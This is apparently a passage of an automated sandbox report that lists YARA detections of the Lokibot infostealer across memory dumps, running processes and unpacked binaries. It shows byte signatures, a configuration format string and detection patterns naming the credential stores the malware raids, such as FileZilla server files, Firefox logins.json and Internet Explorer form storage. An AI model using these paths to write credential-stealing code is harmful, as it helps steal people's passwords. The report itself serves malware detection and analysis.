0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000004.00000002.2169163154.00000000067C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Process Memory Space: palladiums.exe PID: 7092	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7092	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7092	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2c46ad:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 6784	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Dhy2kmz.exe PID: 6552	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Dhy2kmz.exe PID: 6552	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: palladiums.exe PID: 7220	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7220	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7220	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x13d41f:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7276	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7276	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7276	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3526d7:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7304	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7304	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7304	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x40134:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7364	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7364	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7364	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ccbb:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7432	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7432	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7432	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x789cc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7500	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7500	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7500	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1afd0f:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7544	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7544	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7544	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3420ba:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7576	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7576	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7576	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x5478:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7600	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7600	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7600	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3a113a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7620	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7620	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7620	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xaa4b9:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7672	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7672	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7672	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1d0441:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7696	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7696	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7696	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x21367e:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7716	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7716	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7716	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x13e008:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7736	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7736	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7736	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x242c73:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7760	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7760	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7760	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2aba2c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7780	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7780	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7780	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x49ea5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7800	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7800	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7800	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x23a0a7:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7820	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7820	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7820	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x29c250:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: palladiums.exe PID: 7856	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: palladiums.exe PID: 7856	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: palladiums.exe PID: 7856	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x222ee1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 286 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.palladiums.exe.ad0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
14.2.palladiums.exe.ad0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
14.2.palladiums.exe.ad0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.palladiums.exe.ad0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
14.2.palladiums.exe.ad0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
14.2.palladiums.exe.ad0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
14.2.palladiums.exe.ad0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
14.2.palladiums.exe.ad0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
26.2.palladiums.exe.1540000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
26.2.palladiums.exe.1540000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
26.2.palladiums.exe.1540000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
26.2.palladiums.exe.1540000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
26.2.palladiums.exe.1540000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
26.2.palladiums.exe.1540000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
26.2.palladiums.exe.1540000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
